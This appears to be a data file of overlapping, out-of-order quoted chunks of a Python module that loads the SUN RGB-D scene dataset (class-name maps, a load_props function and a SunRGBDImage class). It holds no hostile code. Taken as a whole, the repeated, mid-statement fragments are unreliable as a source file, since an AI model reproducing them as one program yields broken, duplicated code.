"for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for",
"self._extrinsics = None self._Rtilt = None self._K = None @property def data_type(self): return",
"\"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\",",
"path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path,",
"split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class",
"def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def",
"__init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path = path self._label",
"@img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter",
"img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics",
"= rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def",
"import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\",",
"img_name, path, label, split): self._data_type = data_type self._path = path self._label = label",
"def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def",
"def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def",
"= None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K =",
"self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics",
"self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name",
"@property def split(self): return self._split @split.setter def split(self, split): self._split = split @property",
"\"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()}",
"self._path @path.setter def path(self, path): self._path = path @property def label(self): return self._label",
"path(self): return self._path @path.setter def path(self, path): self._path = path @property def label(self):",
"\"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\",",
"img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics =",
"label, split): self._data_type = data_type self._path = path self._label = label self._img_name =",
"path, label, split): self._data_type = data_type self._path = path self._label = label self._img_name",
"\"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id",
"<filename>src/utils/sunrgbd.py<gh_stars>1-10 import os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name =",
"self._data_type = data_type self._path = path self._label = label self._img_name = img_name self._split",
"get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def",
"in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names =",
"start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind]",
"np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label),",
"params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name",
"instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split)",
"split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt = None",
"data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def path(self, path):",
"split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path =",
"None self._extrinsics = None self._Rtilt = None self._K = None @property def data_type(self):",
"extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type",
"sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics",
"v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name",
"\"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\":",
"self._path = path @property def label(self): return self._label @label.setter def label(self, label): self._label",
"= {v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names):",
"dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name",
"return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self):",
"@property def label(self): return self._label @label.setter def label(self, label): self._label = label @property",
"@path.setter def path(self, path): self._path = path @property def label(self): return self._label @label.setter",
"_is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True return False",
"class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in",
"+ rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type ==",
"return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind =",
"numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\":",
"ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids:",
"label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name):",
"= data_type @property def path(self): return self._path @path.setter def path(self, path): self._path =",
"\"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\",",
"name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names",
"k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids =",
"img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics = None",
"\"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k,",
"os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics =",
"cat == cat_name: return True return False def load_props(params, path, split): start_ind =",
"path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path,",
"'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics",
"\"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\":",
"SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path =",
"img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def split(self,",
"\"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\",",
"intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics):",
"= path @property def label(self): return self._label @label.setter def label(self, label): self._label =",
"sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics):",
"= { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\":",
"= None self._Rtilt = None self._K = None @property def data_type(self): return self._data_type",
"\"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\":",
"img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path,",
"self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path",
"path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path =",
"def path(self, path): self._path = path @property def label(self): return self._label @label.setter def",
"self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K = None @property",
"extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt",
"import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\",",
"self._path = path self._label = label self._img_name = img_name self._split = split self._sequence_name",
"def path(self): return self._path @path.setter def path(self, path): self._path = path @property def",
"self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics",
"os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' +",
"data_type self._path = path self._label = label self._img_name = img_name self._split = split",
"os import numpy as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\":",
"from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\",",
"np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True",
"self._label = label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics",
"= img_name @property def split(self): return self._split @split.setter def split(self, split): self._split =",
"return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type =",
"K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_' +",
"def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def",
"= Rtilt @property def K(self): return self._K @K.setter def K(self, K): self._K =",
"= SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics",
"np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image",
"= split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name =",
"in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in",
"return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return",
"\"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" }",
"\"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\":",
"= np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path,",
"\"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\":",
"k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for",
"end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path",
"return self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return self.label",
"\"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k",
"SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics =",
"1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path",
"def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def",
"label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name",
"self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type",
"intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics",
"return self._path @path.setter def path(self, path): self._path = path @property def label(self): return",
"load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1",
"return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return",
"label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name",
"data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name =",
"K(self, K): self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/',",
"= path self._label = label self._img_name = img_name self._split = split self._sequence_name =",
"None self._Rtilt = None self._K = None @property def data_type(self): return self._data_type @data_type.setter",
"= os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/'",
"'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image =",
"self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics",
"data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def path(self,",
"= np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32)",
"sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self,",
"self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name",
"+ '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self): return _is_category_available(self.label)",
"- 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path +",
"self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K",
"None self._K = None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type):",
"def get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name)",
"= img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics =",
"img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path =",
"os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path",
"@K.setter def K(self, K): self._K = K def get_fullname(self): return self.label + '__'",
"= None @property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type =",
"def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter def",
"== DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0]",
"split(self): return self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self):",
"self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return self._split",
"names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name:",
"self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name def is_scene_challenge_category(self): return",
"def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def",
"= data_type self._path = path self._label = label self._img_name = img_name self._split =",
"return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self): return",
"@extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter",
"img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name = img_name @property def split(self):",
"path(self, path): self._path = path @property def label(self): return self._label @label.setter def label(self,",
"[] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def",
"def K(self, K): self._K = K def get_fullname(self): return self.label + '__' +",
"= os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str)",
"self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K",
"np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name =",
"def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path = path",
"@property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property",
"[] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name):",
"extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self,",
"= path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label =",
"self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') +",
"@property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property",
"return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self): return",
"sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage:",
"def split(self): return self._split @split.setter def split(self, split): self._split = split @property def",
"\"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\",",
"self._Rtilt = None self._K = None @property def data_type(self): return self._data_type @data_type.setter def",
"\"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\":",
"_name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if",
"\"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\":",
"img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32)",
"DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path",
"= intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name,",
"self._label @label.setter def label(self, label): self._label = label @property def img_name(self): return self._img_name",
"= class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id",
"split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name",
"data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path,",
"in class_names: if cat == cat_name: return True return False def load_props(params, path,",
"def split(self, split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def",
"get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id) return",
"{v: k for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids",
"def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return True return",
"path @property def label(self): return self._label @label.setter def label(self, label): self._label = label",
"self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return self.label +",
"self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name",
"\"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\":",
"class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names:",
"DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\":",
"\"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\":",
"def K(self): return self._K @K.setter def K(self, K): self._K = K def get_fullname(self):",
"def label(self): return self._label @label.setter def label(self, label): self._label = label @property def",
"path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path",
"@intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter",
"= label @property def img_name(self): return self._img_name @img_name.setter def img_name(self, img_name): self._img_name =",
"@property def K(self): return self._K @K.setter def K(self, K): self._K = K def",
"def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def",
"@property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property",
"return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7",
"dtype=np.float32) extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type,",
"\"study_space\" } class_name_to_id = {v: k for k, v in class_id_to_name.items()} class_names =",
"for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids):",
"+ 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path,",
"else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics",
"return self._label @label.setter def label(self, label): self._label = label @property def img_name(self): return",
"@property def data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property",
"return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat == cat_name: return",
"True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind",
"= None self._extrinsics = None self._Rtilt = None self._K = None @property def",
"cat_name: return True return False def load_props(params, path, split): start_ind = path.find('SUNRGBD') +",
"= split self._sequence_name = None self._intrinsics = None self._extrinsics = None self._Rtilt =",
"@Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return self._K @K.setter",
"self._img_name = img_name @property def split(self): return self._split @split.setter def split(self, split): self._split",
"if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/' img_name =",
"str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image",
"dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)]",
"= path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path",
"intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path,",
"self._sequence_name = sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics",
"class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\",",
"rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path + rel_seq_path label",
"{ \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\",",
"\"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\",",
"return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self): return",
"\"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\":",
"= 'image/' else: img_dir_name = 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path,",
"extrinsics = np.loadtxt(os.path.join( instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name,",
"= extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt =",
"\"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\": \"computer_room\", \"4\": \"conference_room\", \"5\": \"corridor\", \"6\": \"dining_area\",",
"= [] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int)",
"intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self):",
"K): self._K = K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_')",
"basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\", \"2\": \"classroom\", \"3\":",
"ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names:",
"names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = []",
"img_name @property def split(self): return self._split @split.setter def split(self, split): self._split = split",
"\"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\",",
"data_path + rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type",
"label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def img_name(self,",
"= intrinsics @property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics =",
"path self._label = label self._img_name = img_name self._split = split self._sequence_name = None",
"\"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v:",
"img_name): self._img_name = img_name @property def split(self): return self._split @split.setter def split(self, split):",
"\"home_office\", \"11\": \"kitchen\", \"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\",",
"path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD') instance_path = data_path",
"class_names: if cat == cat_name: return True return False def load_props(params, path, split):",
"sequence_name @property def intrinsics(self): return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics",
"self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt",
"= extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split):",
"K(self): return self._K @K.setter def K(self, K): self._K = K def get_fullname(self): return",
"'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'),",
"+ os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32) sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split) sunrgbd_image.sequence_name =",
"extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt):",
"path, str(label), split) sunrgbd_image.sequence_name = rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return",
"sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self, data_type, img_name, path, label,",
"return np.asarray(ids, dtype=np.int) def get_class_names(ids): names = [] for _id in ids: _name",
